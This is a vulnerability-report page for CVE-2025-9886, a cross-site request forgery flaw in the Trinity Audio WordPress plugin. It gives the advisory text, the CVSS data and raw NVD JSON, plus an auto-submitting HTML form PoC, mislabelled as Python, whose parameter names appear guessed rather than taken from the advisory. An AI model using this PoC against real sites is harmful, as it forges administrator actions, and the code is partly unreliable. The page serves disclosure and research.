Security Vulnerability Report
中文
CVE-2025-9886 CVSS 4.3 MEDIUM

CVE-2025-9886

Published: 2025-10-04 04:16:25
Last Modified: 2026-04-15 00:35:42

Description

The Trinity Audio – Text to Speech AI audio player to convert content into audio plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 5.20.2. This is due to missing or incorrect nonce validation in the '/admin/inc/post-management.php' file. This makes it possible for unauthenticated attackers to activate/deactivate posts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Trinity Audio 插件 所有版本 ≤ 5.20.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CVE-2025-9886 Trinity Audio CSRF PoC --> <!-- Save as exploit.html and host on attacker server, then trick admin into visiting --> <html> <head><title>Loading...</title></head> <body> <!-- Auto-submitting form to toggle post status via CSRF --> <form id="csrf-form" action="https://target-wordpress-site.com/wp-admin/admin.php" method="POST"> <!-- Target page: Trinity Audio post management --> <input type="hidden" name="page" value="trinity-audio" /> <input type="hidden" name="action" value="toggle_post_status" /> <!-- Post ID to deactivate/activate --> <input type="hidden" name="post_id" value="1" /> <input type="hidden" name="new_status" value="deactivate" /> </form> <script> // Auto-submit the form when admin visits this page document.getElementById('csrf-form').submit(); </script> </body> </html> <!-- Alternative: Image-based CSRF (no JS required) --> <!-- <img src="https://target-site.com/wp-admin/admin.php?page=trinity-audio&action=toggle_post_status&post_id=1&new_status=deactivate" /> -->

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-9886", "sourceIdentifier": "[email protected]", "published": "2025-10-04T04:16:24.730", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Trinity Audio – Text to Speech AI audio player to convert content into audio plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 5.20.2. This is due to missing or incorrect nonce validation in the '/admin/inc/post-management.php' file. This makes it possible for unauthenticated attackers to activate/deactivate posts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/trinity-audio/tags/5.20.1/admin/inc/post-management.php#L7", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3371934%40trinity-audio&new=3371934%40trinity-audio&sfp_email=&sfph_mail=", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/f57d99dc-3faa-4dfc-9cb6-fdb5647daf9a?source=cve", "source": "[email protected]"}]}}